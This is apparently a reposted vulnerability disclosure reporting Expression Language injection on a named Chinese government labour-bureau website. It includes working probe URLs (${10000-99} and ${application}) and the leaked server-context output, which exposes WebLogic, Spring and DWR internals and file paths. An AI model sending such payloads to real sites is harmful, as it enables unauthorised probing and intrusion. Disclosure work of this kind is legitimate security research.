Expression language injection

来源:互联网 发布:矩阵可逆与秩的关系 编辑:程序博客网 时间:2024/06/05 21:00

Expression language injection

详细说明:

站点:http://www.zjhz.lss.gov.cn/



测试连接:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d



效果如图:

QQ截图20150410205845.png





测试方法是参照这个的:

大众点评某站点Expression language injection | WooYun-2014-71160 | WooYun.org

WooYun: 大众点评某站点Expression language injection 



应该是这样玩的吧(⊙v⊙)

漏洞证明:

http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d



QQ截图20150410205845.png





view-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}



code 区域
<script src="/web/resource/script/list_utf8.js?year=%7Borg.directwebremoting.Container%3Dorg.directwebremoting.impl.DefaultContainer%406f55455e%2C+org.directwebremoting.ContainerList%3D%5Borg.directwebremoting.impl.DefaultContainer%406f55455e%5D%2C+__oscache_cache%3Dcom.opensymphony.oscache.web.ServletCache%406c70a195%2C+__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%2C+weblogic.servlet.WebAppComponentRuntimeMBean%3Dweblogic.servlet.internal.WebAppRuntimeMBeanImpl%4026c66b4a%2C+org.springframework.web.context.WebApplicationContext.ROOT%3Dorg.springframework.web.context.support.XmlWebApplicationContext%4036e79009%3A+display+name+%5BRoot+WebApplicationContext%5D%3B+startup+date+%5BTue+Feb+10+17%3A32%3A25+CST+2015%5D%3B+root+of+context+hierarchy%2C+__oscache_admins%3D%7B__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%7D%2C+org.directwebremoting.WebContextFactory%24WebContextBuilder%3Dorg.directwebremoting.impl.DefaultWebContextBuilder%404ed39061%2C+javax.servlet.context.tempdir%3D%2Fopt%2FMiddleware%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2Fapp1%2Ftmp%2F_WL_user%2Fweb%2Faakfdm%2Fpublic%2C+javax.servlet.ServletConfig%3Dweblogic.servlet.internal.ServletStubImpl%404422e93c+-+dwr-invoker+class%3A+%27uk.ltd.getahead.dwr.DWRServlet%27%2C+freemarker.Configuration%3Dfreemarker.template.Configuration%404b7c27f3%2C+weblogic.servlet.WebAppComponentMBean%3Dweblogic.management.configuration.WebAppComponentMBeanImpl%401a3b23f1%28%5Bbase_domain%5D%2FApplications%5Bweb%5D%2FWebAppComponents%5Bweb%5D%29%2C+org.directwebremoting.impl.ServerContext%3Dorg.directwebremoting.impl.DefaultServerContext%40568074d1%2C+contextConfigLocation%3D%2FWEB-INF%2Fclasses%2FapplicationContext.xml%2C+com.sun.faces.config.WebConfiguration%3Dcom.sun.faces.config.WebConfiguration%4023abf8b5%2C+javax.servlet.http.HttpServlet%3Duk.ltd.getahead.dwr.DWRServlet%404ffe8516%7D"></script>

站点:http://survey.dianping.com/



1.PNG





2.PNG



漏洞证明:

1.PNG





2.PNG


0 0
原创粉丝点击